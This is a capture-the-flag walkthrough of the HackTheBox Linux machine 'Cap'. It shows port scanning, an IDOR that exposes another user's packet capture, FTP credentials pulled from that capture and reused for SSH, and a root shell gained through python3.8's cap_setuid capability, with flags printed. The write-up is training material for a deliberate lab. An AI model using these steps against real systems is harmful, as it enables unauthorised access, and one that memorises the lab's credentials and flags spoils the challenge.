Cap

#Linux #Enumeration #Wireshark #IDOR #Capabilities

Cap is an easy-rated Linux machine from HackTheBox created by InfoSecJack. In the current post, my IP is 10.10.14.59, and the target’s IP is 10.129.252.36.

This machine runs an HTTP server with an open site with downloadable files with captured non-encrypted traffic. The improper control of this information results in Insecure Direct Object Reference (IDOR) by just changing a parameter at the URL, giving access to another user's capture with credentials inside. Then, for Privilege Scalation, there is an exploitable Linux capability.

Gathering Information

First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.

Local Terminal

$ ping 10.129.252.36

Pinging 10.129.252.36 with 32 bytes of data:
Reply from 10.129.252.36: bytes=32 time=488ms TTL=63
Reply from 10.129.252.36: bytes=32 time=149ms TTL=63
Reply from 10.129.252.36: bytes=32 time=150ms TTL=63
Reply from 10.129.252.36: bytes=32 time=159ms TTL=63

Ping statistics for 10.129.252.36:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 149ms, Maximum = 488ms, Average = 236ms

The target machine is working, and by the TTL we can assume that is a Linux Machine.

Local Terminal

$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.252.36 -oN Ports

Nmap scan report for 10.129.252.36
Host is up, received echo-reply ttl 63 (0.27s latency).
Scanned at 2023-05-22 15:24:10 Pacific SA Standard Time for 18s
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 18.28 seconds
           Raw packets sent: 87205 (3.837MB) | Rcvd: 85813 (3.433MB)

Local Terminal

$ nmap -sCV -p 21,22,80 10.129.252.36 -oN WebScan

Nmap scan report for 10.129.252.36
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-title: Security Dashboard
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Mon, 22 May 2023 19:25:10 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Server: gunicorn
<...>

Ubuntu and http with gunicorn server, information worth to save.

Local Terminal

$ echo "10.129.252.36 cap.htb

Local Terminal

$ whatweb http://10.129.220.13

http://10.129.252.36 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, 
HTTPServer[gunicorn], IP[10.129.252.36], JQuery[2.2.4], Modernizr[2.8.3.min], 
Script, Title[Security Dashboard], X-UA-Compatible[ie=edge]

Now that we have the basic information, we have to try with the generic tests, first with the FTP port

Local Terminal

$ ftp 10.129.252.36        # user: anonymous        pass: 

Connected to 10.129.252.36.
220 (vsFTPd 3.0.3)
Name (10.129.252.36:robertoalfaro): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed # Nothing here for now

Browser: http://10.129.252.36

Security Snapshot looks like an interesting site, you will be at http://10.129.252.36/data/1, there you can download a pcap file to analyze with Wireshark or other tool.

I assume that in the file should be information about the FTP server, that filter will be applied.

Local Terminal

$ tshark -r 1.pcap "ftp" 2>/dev/null #Nothing

   51   1.706787 10.129.220.13 → 10.10.14.18  FTP 76 Response: 220 (vsFTPd 3.0.3)
   65   1.922434  10.10.14.18 → 10.129.220.13 FTP 66 Request: AUTH TLS
   67   1.922631 10.129.220.13 → 10.10.14.18  FTP 94 Response: 530 Please login with USER and PASS.
   77   2.110156  10.10.14.18 → 10.129.220.13 FTP 62 Request: QUIT
   79   2.110307 10.129.220.13 → 10.10.14.18  FTP 70 Response: 221 Goodbye.
   87   2.391856  10.10.14.18 → 10.129.220.13 FTP 573 Request: \026\003\001\002\000\001\000\001�\003\003��E�[9��!3�C�+�+��u�2���͔\a\036�I P���9\016\025��O[U\b/XS�]��h��b�4\000\023M��\000�\023\002\023\003\023\001\000\005\000\026\0003\0009\0005\000
   89   2.397110 10.129.220.13 → 10.10.14.18  FTP 76 Response: 220 (vsFTPd 3.0.3)
   90   2.397233 10.129.220.13 → 10.10.14.18  FTP 94 Response: 530 Please login with USER and PASS.
   91   2.397316 10.129.220.13 → 10.10.14.18  FTP 94 Response: 530 Please login with USER and PASS.
   92   2.397361 10.129.220.13 → 10.10.14.18  FTP 94 Response: 530 Please login with USER and PASS.
   93   2.397403 10.129.220.13 → 10.10.14.18  FTP 94 Response: 530 Please login with USER and PASS.
   94   2.397445 10.129.220.13 → 10.10.14.18  FTP 94 Response: 530 Please login with USER and PASS.
   95   2.397487 10.129.220.13 → 10.10.14.18  FTP 94 Response: 530 Please login with USER and PASS.
  103   2.796944 10.129.220.13 → 10.10.14.18  FTP 76 Response: 220 (vsFTPd 3.0.3)
  104   2.828784  10.10.14.18 → 10.129.220.13 FTP 148 Request: \026\003\001\000W\001\000\000S\003\003c�����\002���8�ⴜΖ�m��c\030�(�R;�
  106   2.828897 10.129.220.13 → 10.10.14.18  FTP 94 Response: 530 Please login with USER and PASS.
  107   2.828921 10.129.220.13 → 10.10.14.18  FTP 132 Response: 530 Please login with USER and PASS.

There is nothing here, but that site in particular is giving us a lot of information, a good option is to change the parameter of the URL and analyze the new file.

Browser: http://10.129.252.36/data/0

Local Terminal

$ tshark -r 0.pcap "ftp" 2>/dev/null

   34   2.626895 192.168.196.16 → 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
   36   4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
   38   4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
   40   5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
   42   5.432387 192.168.196.16 → 192.168.196.1 FTP 79 Response: 230 Login successful.
   43   5.432801 192.168.196.1 → 192.168.196.16 FTP 62 Request: SYST
   45   5.432937 192.168.196.16 → 192.168.196.1 FTP 75 Response: 215 UNIX Type: L8
   47   6.309628 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,140
   49   6.309874 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   50   6.310514 192.168.196.1 → 192.168.196.16 FTP 62 Request: LIST
   51   6.311053 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
   52   6.311479 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
   54   7.380771 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,141
   55   7.380998 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   56   7.381554 192.168.196.1 → 192.168.196.16 FTP 66 Request: LIST -al
   57   7.382165 192.168.196.16 → 192.168.196.1 FTP 95 Response: 150 Here comes the directory listing.
   58   7.382504 192.168.196.16 → 192.168.196.1 FTP 80 Response: 226 Directory send OK.
   60  28.031068 192.168.196.1 → 192.168.196.16 FTP 64 Request: TYPE I
   61  28.031221 192.168.196.16 → 192.168.196.1 FTP 87 Response: 200 Switching to Binary mode.
   62  28.031547 192.168.196.1 → 192.168.196.16 FTP 84 Request: PORT 192,168,196,1,212,143
   63  28.031688 192.168.196.16 → 192.168.196.1 FTP 107 Response: 200 PORT command successful. Consider using PASV.
   64  28.031932 192.168.196.1 → 192.168.196.16 FTP 72 Request: RETR notes.txt
   65  28.032072 192.168.196.16 → 192.168.196.1 FTP 82 Response: 550 Failed to open file.
   67  31.127551 192.168.196.1 → 192.168.196.16 FTP 62 Request: QUIT
   68  31.127652 192.168.196.16 → 192.168.196.1 FTP 70 Response: 221 Goodbye.
   
# If you want to see the information more clear, you can use:
$ tshark -r 0.pcap -Y "ftp" -Tjson 2>/dev/null #To check the desired field
$ tshark -r 0.pcap -Y "ftp" -Tfields -e tcp.payload 2>/dev/null | xxd -ps -r

And we found credentials in that file, now we should be able to connect to the FTP server {user: nathan // password: Buck3tH4TF0RM3!}

Local Terminal

$ ftp 10.129.252.36

Connected to 10.129.252.36.
220 (vsFTPd 3.0.3)
Name (10.129.252.36:robertoalfaro): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

$ ls

229 Entering Extended Passive Mode (|||28192|)
150 Here comes the directory listing.
-r--------    1 1001     1001           33 May 22 16:12 user.txt #Just one file
226 Directory send OK.

$ get user.txt
100% |*********************************************************************************************************|    33       20.89 KiB/s    00:00 ETA
226 Transfer complete.

$ exit

Inside the FTP there was only a file called user.txt, has the name of the flag, but by the location looks like a fake flag.

Local Terminal

$ cat user.txt
b95a4a7339ef9a54ec29b489b69269d2

By bad, it was the flag... that's nice. So we got the flag without properly exploiting something.

Privileges Escalation?

Well, we have some credentials, what if we use then at the SSH too?

Local Terminal

$ ssh nathan@10.129.252.36  # Buck3tH4TF0RM3!

nathan@cap:~$ whoami
nathan

It works!

Target Terminal [nathan]

nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)

nathan@cap:~$ sudo -l
[sudo] password for nathan:
Sorry, user nathan may not run sudo on cap.

nathan@cap:~$ find \-perm -4000 2>/dev/null
# Nothing

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip # Here!!
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Python3.8 have capabilities, with this we can change to root easily

Target Terminal [nathan]

nathan@cap:~$ python3.8
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("bash")

root@cap:~# cat /root/root.txt
ec8be766a686cb313b6d076df5defb25

PreviousBastion NextExplore

Last updated 1 year ago